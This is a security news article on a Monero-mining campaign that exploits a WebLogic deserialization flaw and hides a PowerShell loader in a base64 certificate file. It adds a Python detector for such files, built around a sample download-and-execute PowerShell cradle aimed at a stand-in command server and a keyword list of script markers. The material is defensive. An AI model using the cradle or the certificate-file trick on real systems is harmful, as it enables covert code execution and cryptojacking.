Cybersecurity Report: New Monero Mining Malware Hides within Certificate Files


Malware that hides cryptocurrency-mining bots has grown over the past few years into one of the most popular ways for attackers to hijack other people’s processing power to mine cryptocurrency. Recently, the cybersecurity firm Trend Micro released a security advisory regarding a deserialization vulnerability in Oracle WebLogic Server that can be exploited for cryptocurrency mining.

In April 2019, Trend Micro detected a series of attacks that exploited this WebLogic deserialization vulnerability (tracked as CVE-2019-2725) to install Monero cryptocurrency-mining malware. Reports also surfaced on the SANS ISC InfoSec forums, which already pointed to Monero mining malware. Trend Micro’s subsequent analysis confirmed that the malware hides its malicious code in certificate files as an obfuscation tactic.

According to Trend Micro’s findings, the campaign begins by targeting CVE-2019-2725 on the victim’s system. The malware exploits it to execute a command that kicks off a series of software routines.

Getting Technical with the Monero Mining Malware

First, a PowerShell script downloads a certificate file from the malware’s command-and-control (C&C) server and saves it under %APPDATA% with the file name cert.cer.

It then uses CertUtil, a built-in Windows utility, to decode the certificate file; the decoded content is a PowerShell command. That command downloads and executes another PowerShell script directly in memory, which in turn downloads and executes several more files.

The downloaded files include Sysupdate.exe, the Monero miner payload; Config.json, the configuration file for the XMR miner; Networkservice.exe, possibly used for propagating to and exploiting other WebLogic servers; Sysguard.exe, which acts as the watchdog for the miner process; Update.ps1, a PowerShell script that runs every 30 seconds; and Clean.bat, which deletes other components.
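The obfuscation described above works because CertUtil will happily decode any base64 body wrapped in PEM armor, whether or not it is a certificate. As an added illustration (not code from the article or from Trend Micro), the following Python check tells a real DER-encoded certificate apart from a script hidden in a .cer file; the sample inputs and the c2.invalid URL are constructed for the demonstration.

```python
import base64
import binascii
import re

# Strings that indicate the decoded payload is a script rather than a certificate.
SCRIPT_MARKERS = ("powershell", "invoke-expression", "iex ", "downloadstring",
                  "-encodedcommand", "new-object", "start-process")

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def looks_like_der(data: bytes) -> bool:
    """True if data is one DER SEQUENCE whose encoded length matches the byte count.
    A real X.509 certificate is exactly that; a text script never is."""
    if len(data) < 2 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:                       # short-form length
        header, length = 2, first
    else:                                  # long-form: 0x8N followed by N length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(data) < 2 + n:
            return False
        header, length = 2 + n, int.from_bytes(data[2:2 + n], "big")
    return header + length == len(data)


def classify_cer(pem_text: str) -> str:
    """Classify what a PEM 'certificate' file actually decodes to."""
    m = PEM_RE.search(pem_text)
    if not m:
        return "no-pem-block"
    b64 = "".join(m.group(1).split())
    try:
        payload = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return "invalid-base64"
    if looks_like_der(payload):
        return "der-certificate"
    # Strip NUL bytes so a UTF-16 encoded script is matched as well.
    text = payload.replace(b"\x00", b"").decode("utf-8", errors="ignore").lower()
    if any(marker in text for marker in SCRIPT_MARKERS):
        return "embedded-script"
    return "unknown-payload"


# Constructed sample 1: a minimal DER SEQUENCE (valid ASN.1 framing, not a real certificate).
BENIGN_CER = ("-----BEGIN CERTIFICATE-----\n"
              + base64.b64encode(b"\x30\x03\x02\x01\x01").decode()
              + "\n-----END CERTIFICATE-----\n")

# Constructed sample 2: a PowerShell download cradle in PEM armor, mimicking the cert.cer trick.
CRADLE = b"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2.ps1')"
MALICIOUS_CER = ("-----BEGIN CERTIFICATE-----\n"
                 + base64.b64encode(CRADLE).decode()
                 + "\n-----END CERTIFICATE-----\n")
```

On a real host the same check can be run over every .cer file under %APPDATA%, and a certutil -decode invocation whose input fails the DER test is worth an alert.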

Not the First Monero Mining Malware

This isn’t the only Monero malware case reported in recent months. Earlier, Trend Micro discovered BlackSquid, a new malware family capable of exploiting eight notorious vulnerabilities, including EternalBlue and DoublePulsar, to install the XMRig Monero miner. The Nansh0u crypto-mining campaign in May 2019 infected more than 50,000 servers by exploiting vulnerabilities.

Trend Micro, in its official blog post, also suggests several ways to remove this malware and stay protected against it. The recommendations include its own malware-protection suite and a few other precautions that users should be aware of.
